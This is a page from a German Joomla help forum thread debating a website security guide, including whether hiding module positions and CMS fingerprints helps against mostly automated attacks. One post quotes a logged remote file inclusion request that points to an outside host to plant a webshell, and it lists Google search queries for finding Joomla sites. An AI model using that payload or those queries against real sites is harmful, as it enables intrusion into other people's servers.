+ Antworten
Seite 8 von 8 ErsteErste ... 4 5 6 7 8
Ergebnis 71 bis 73 von 73

Thema: Mein Sicherheitsleitfaden

  1. 03.01.2011 12:57 #71
    ronja-needs-help
    ronja-needs-help ist offline
    Neu an Board
    Registriert seit
    16.10.2010
    Beiträge
    89
    Bedankte sich
    26
    Erhielt 8 Danksagungen
    in 7 Beiträgen

    Standard

    Vielen Dank Ihr Zwei!

    Ich hatte parallel zu Euch noch einen Edit in meinen vorherigen Post vorgenommen. Habt Ihr auf die zweite Frage eventuell einen Hinweis für mich, wo das Problem liegen könnte (betr. "?tp=1" in der .htaccess)?
    Zitieren Zitieren
  2. 03.01.2011 17:09 #72
    keraM
    keraM ist gerade online
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Zitat Zitat von ronja-needs-help Beitrag anzeigen
    2. Ich habe den Code-Schnipsel von Punkt 12 in die .htaccess-Datei aus meinem Root-Verzeichnis kopiert. Allerdings werden die Modul-Positionen immernoch angezeigt. Woran könnte das liegen? Muss man irgendetwas dabei beachten? (z.B. an welcher Stelle der Schnipsel in der .htaccess-Datei steht o.ä.?)
    Auch hier solltest Du Dir wieder die Frage nach dem "Warum?" stellen.

    Der Sicherheitsleitfaden von Worti sagt dazu:
    "Nicht nur, dass man auch hier eine Joomla Seite erkennt, nein, warum
    sollten Sie Ihre Modulpositionen zeigen."
    Was ist schlimm daran, eine Seite als Joomla Seite zu erkennen? Meistens sieht man es ohnehin schon so.
    Außerdem, warum sollte ich die Modulpositionen verstecken sollen. Sicher kann man sie verstecken, aber warum? Geht davon irgendeine tatsächliche Gefahr für die Sicherheit der Site aus? Gibt es konkrete Angriffsszenarien, die darauf zurückzuführen sind? Mir ist da nichts bekannt. Meist wurden unsichere Erweiterungen und Lücken in nicht aktuellen Joomlas ausgenutzt. Diese Angriffe hätten auch funktioniert, wenn die Modulpositionen versteckt gewesen wären.
    Geändert von keraM (03.01.2011 um 17:38 Uhr)
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!
    Zitieren Zitieren
  3. 03.01.2011 20:32 #73
    Skodi
    Skodi ist offline
    War schon öfter hier
    Registriert seit
    30.01.2006
    Beiträge
    233
    Bedankte sich
    30
    Erhielt 38 Danksagungen
    in 30 Beiträgen

    Standard

    Sagen wirs mal so, wenn jemand ganz gezielt versucht Lieschen Müllers Webseite zu hacken, kann es ihm dadurch erschwert werden - wenn er nicht weiß, auf welchem CMS die Seite basiert. Aber das Verhindern des ?tp=1 Aufrufes hilft dabei letztlich auch nur dann was, wenn man ALLE anderen Hinweise auch entfernt.

    Eigene 404-Seite, Templates-Pfad ändern, CSS-Klassen umbenennen, Divs umbenennen, Generator-Tag entfernen, Powered by entfernen, Urls ändern usw. Auch die robots.txt verrät häufig schon das eingesetzte CMS. usw.

    Viele Hacks sind Blindschüsse... nach dem Gießkannen-Prinzip... Da wird alles mögliche versucht - und ab und zu passt der Schlüssel halt mal - Meistens nicht. Das ist ähnlich wie mit Spam... Auf 500.000 Spammails kommen, keine Ahnung, sagen wir mal 2-Bestellungen im Vi@gra-Shop. Da das Versenden der Spams nichts kostet - hat sichs gelohnt.

    Nur mal als Beispiel:
    z.B. habe ich in den Logs häufig soetwas stehen:
    GET //forum/userLogin.php?config[forum_installed]=http://www.unkenntlich-gemacht.org/verzeichnis/datei.txt??

    Da wird versucht eine webshell über eine verwundbare Forensoftware einzuschleusen.. auf meiner Seite läuft gar kein Forum.

    Manchmal gibt man sich etwas mehr Mühe, in dem man z.B. über den google-suchparameter inurl:index.php?com_content&view o.ä. nach Joomla-Webseiten sucht und es dann gezielt auf bekannte Joomla-Schwachstellen versucht. Dagegen kann man sich evtl. mit SEO-Urls ein bisschen wehren... aber da gibts auch Abfragen, welche z.B. auf das Bilderverzeichnis abzielen: inurl:images/stories

    Und selbst ein bombensicheres Joomla hilft nicht viel, wenn es ein anderes Einfallstor gibt. Ein bekannter hat mich mal um Hilfe gerufen - weil sein Joomla gehackt war... dabei stellte sich heraus... dass er vor Jahren mal zum testen eine Chat-Software auf seinem Webspace hatte, diese nicht gelöscht hatte und dann über eine Lücke dort eine webshell installiert wurde... da half dann der ganze Joomla-Schutz nicht viel..

    Das nächste Problem sind die FTP-Programme ... Ich habs hier schonmal geschrieben.. es gibt Trojaner die speziell Filezilla-Zugangsdaten auslesen... auf Knopfdruck!

    Hat man das Problem umgangen, kann man sich mal mit Hardware-Keyloggern beschäftigen oder mit infizierten Usb-Sticks, oder mit der (Un)Sicherheit seines Smartphones, oder mit Cookie-Klau in öffentlichen Wlans.

    Dann gibts Hoster, denen werden die Server gehackt... das ist mir 2004 bei einem Hoster mal passiert... da ist man dann obwohl man alles mögliche und unmögliche gemacht hat trotzdem machtlos.

    Da könnte man noch endlos weitermachen... man kommt vom 100te ins 1000ste.

    Letztlich muss jeder selber entscheiden, wie stark er im Bereich Sicherheit aufrüsten muss/möchte... und um da selber eine vernünftige Beurteilung zu treffen, sind solche Threads wie diese hier sicherlich hilfreich, deshalb nochmal ein Dank an worti für die Arbeit die er sich hier gemacht hat!
    Zitieren Zitieren
+ Antworten
Seite 8 von 8 ErsteErste ... 4 5 6 7 8
« Vorheriges Thema | Nächstes Thema »

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein

Foren-Regeln